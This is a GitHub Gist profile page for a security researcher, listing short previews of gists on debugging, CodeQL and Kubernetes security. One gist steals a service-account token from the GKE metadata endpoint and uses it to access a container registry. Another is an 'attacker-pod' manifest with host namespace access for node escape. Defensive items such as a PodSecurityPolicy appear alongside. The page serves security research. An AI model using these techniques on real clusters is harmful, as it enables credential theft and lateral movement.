Skip to content

Instantly share code, notes, and snippets.

View abhisek's full-sized avatar
👾
Building stuff

Abhisek Datta abhisek

👾
Building stuff
341 followers · 3 following
View GitHub Profile
@abhisek
abhisek / dbg1.c
Created January 15, 2022 15:24
#include <stdio.h>
#include <stdlib.h>
#include <sys/ptrace.h>
#include <sys/types.h>
#include <unistd.h>
#include <assert.h>
#include <signal.h>
void hello() {
printf("Hello debugger\n");
@abhisek
abhisek / gke-pod-hacks.sh
Last active May 12, 2020 23:55
Lateral movement in GKE Pod using Cloud metadata endpoint
# Get temporary access token using Google Cloud instance metadata
export TOKEN=$(curl -sk -H "Metadata-Flavor: Google" \
http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token | \
jq -r '.access_token')
# List all repo from Google cloud registry using access token
curl -u "oauth2accesstoken:$TOKEN" https://eu.gcr.io/v2/_catalog
# Docker login
echo $TOKEN | docker login --username oauth2accesstoken --password-stdin eu.gcr.io
@abhisek
abhisek / go-int-down-casting.ql
Created May 2, 2020 05:37
CodeQL query to find integer casting issues
import go
import semmle.go.dataflow.DataFlow
import semmle.go.dataflow.TaintTracking
class IntegerSource extends Function {
IntegerSource() {
this.hasQualifiedName("strconv", "Atoi") or
this.hasQualifiedName("strconv", "ParseInt")
}
}
@abhisek
abhisek / ghidra.sh
Created April 20, 2020 16:31
Ghidra in docker
ghidra () {
del_stopped ghidra
xhost +local:root
docker run --init -it --rm --name ghidra --cpus 2 --memory 4g -e MAXMEM=4G -v /etc/localtime:/etc/localtime:ro -v /tmp/.X11-unix:/tmp/.X11-unix -v "${HOME}/.gtkrc:/root/.gtkrc" -e "DISPLAY=unix${DISPLAY}" -v /home/user1/Work/ghidra/conf/.ghidra:/root/.ghidra -v /home/user1/Work/ghidra:/root/storage blacktop/ghidra
xhost -local:root
}
ghidra
@abhisek
abhisek / psp.yml
Created March 17, 2020 09:10
PodSecurityPolicy to Prevent hostPath Mount
apiVersion: policy/v1beta1
kind: PodSecurityPolicy
metadata:
name: developers-psp
spec:
privileged: false
allowPrivilegeEscalation: false
hostNetwork: false
hostPID: false
hostIPC: false
@abhisek
abhisek / pod-to-node.yml
Created March 17, 2020 04:35
Kubernetes Pod hostPath Volume Mount
apiVersion: v1
kind: Pod
metadata:
labels:
run: attacker-pod
name: attacker-pod
spec:
hostPID: true
hostIPC: true
hostNetwork: true
@abhisek
abhisek / sa-to-kubeconfig.sh
Created March 17, 2020 04:16
Generate kubeconfig for Service Account
#!/bin/bash
export TARGET_CONFIGSERVER=$(kubectl cluster-info | grep master | awk '{print $NF}' | sed 's/\x1B\[[0-9;]\+[A-Za-z]//g')
export TARGET_TOKENNAME=$(kubectl -n developers get sa developer-sa -o jsonpath='{.secrets[0].name}')
export TARGET_CONFIGTOKEN=$(kubectl -n developers get secret $TARGET_TOKENNAME -o "jsonpath={.data.token}" | base64 -d)
export TARGET_CONFIGCRT=$(kubectl -n developers get secret $TARGET_TOKENNAME -o "jsonpath={.data['ca\.crt']}")
cat <<EOF
apiVersion: v1
kind: Config
@abhisek
abhisek / k8s-sa-pod-crud.yml
Created March 17, 2020 04:08
Kubernetes Service Account with Pod CRUD Privilege to Single Namespace
apiVersion: v1
kind: Namespace
metadata:
name: developers
---
apiVersion: v1
kind: ServiceAccount
metadata:
@abhisek
abhisek / pod-node-access.yml
Created November 20, 2019 10:55
Pod with Node Access
apiVersion: v1
kind: Pod
metadata:
labels:
run: ubuntu-1
name: ubuntu-1
spec:
hostPID: true
hostIPC: true
hostNetwork: true
@abhisek
abhisek / mongo-api-client.js
Created July 5, 2019 09:54
Mongo Cloud Atlas Events API to Elasticsearch
'use strict'
const MONGO_ATLAS_USERNAME = 'USER'
const MONGO_ATLAS_APIKEY = 'APIKEY'
const MONGO_ATLAS_STAGING_GROUP_ID = 'ID1'
const MONGO_ATLAS_PRODUCTION_GROUP_ID = 'ID2'
const MONGO_ATLAS_EVENTS_API = 'https://cloud.mongodb.com/api/atlas/v1.0/groups/{{GROUP-ID}}/events'